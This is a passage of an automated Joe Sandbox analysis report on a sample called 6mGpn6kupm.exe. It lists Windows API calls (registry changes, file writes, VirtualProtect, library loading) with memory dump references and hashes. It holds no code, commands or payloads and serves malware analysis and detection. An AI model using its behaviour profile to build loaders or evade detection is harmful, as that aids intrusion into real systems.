                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                              • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                              • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                              • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                              APIs
                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseDeleteValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 2831762973-0
                                                                                                              • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                              • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                              • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                              • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnableShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1136574915-0
                                                                                                              • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                              • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                              • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                              • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2547128583-0
                                                                                                              • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                              • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                              • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                              • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\6mGpn6kupm.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate
                                                                                                              • String ID:
                                                                                                              • API String ID: 415043291-0
                                                                                                              • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                              • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                              • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                              • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1375471231-0
                                                                                                              • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                              • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                              • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                              • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                              APIs
                                                                                                              • EnumWindows.USER32(00000000), ref: 701C2B6B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 1129996299-0
                                                                                                              • Opcode ID: 12aa14a907f0167b7a8f595848ff7999b3651fb5f81760a3767a1f3252ca5ca2
                                                                                                              • Instruction ID: 6dd315238940a31554fc28262c45156bb5a147d47c31fffd90831c56ce28b50b
                                                                                                              • Opcode Fuzzy Hash: 12aa14a907f0167b7a8f595848ff7999b3651fb5f81760a3767a1f3252ca5ca2
                                                                                                              • Instruction Fuzzy Hash: A5416C72800204DFDB21DFA5DD52B6F3B65FB34368F3044AAF405C7960D638E8908B95
                                                                                                              APIs
                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileMove
                                                                                                              • String ID:
                                                                                                              • API String ID: 3562171763-0
                                                                                                              • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                              • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                              • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                              • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointerwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 327478801-0
                                                                                                              • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                              • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                              • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                              • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                              APIs
                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                              • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                              • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                              • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                              • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                              APIs
                                                                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004125A6,0040CED0,004033DE,0040CED0,004125A6,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                              • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                              • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(701C505C,00000004,00000040,701C504C), ref: 701C29B1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: d022d9631aa6bfff8f1b15f3ec3880c396015be5e57ec1649b7de03932096c37
                                                                                                              • Instruction ID: c91394021f28d3312717b1cc5e7617f726e0ad664dac8cc1211827c396fd3393
                                                                                                              • Opcode Fuzzy Hash: d022d9631aa6bfff8f1b15f3ec3880c396015be5e57ec1649b7de03932096c37
                                                                                                              • Instruction Fuzzy Hash: E0F0A5B2544280DEC350CF2A8C6472B3FE0B728308BB0456AF588D6A60E374C4E4DB99
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                              • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                              • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                              • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                              • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                              • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,701C123B,?,701C12DF,00000019,701C11BE,-000000A0), ref: 701C1225
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
